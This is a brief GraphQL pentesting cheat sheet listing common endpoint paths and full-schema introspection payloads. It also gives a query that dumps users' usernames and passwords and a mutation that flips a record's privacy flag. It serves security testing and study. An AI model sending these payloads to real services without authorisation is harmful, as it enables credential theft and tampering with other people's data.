GraphQL Pentesting
Last modified: 2023-03-20
An open-source data query and manipulation language for APIs, and a runtime for fulfilling queries with existing data.
Common Directories
/graphql
/graphiql
/graphql.php
/graphql/console
Queries
Insert the following payloads while checking the result outputs.
/graphql?q={}
/graphql?q={__schema{}}
/graphql?q={__schema{types{name}}}
/graphql?q={__schema{types{fields{name}}}}
/graphql?q={__schema{types{fields{name description}}}}
/graphql?q={__schema{types{name,fields{name}}}}
/graphql?q={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
# Dump the database schema
/graphql?q=fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
/graphql?q=fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef }}fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue}fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } }}query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } }}
# Dump specified field
/graphql?q={getUsers{username,password}}
Managing Mutation
Modify server-side data.
mutation {
modifyBug(id: 2, private: false) {
ok
}
}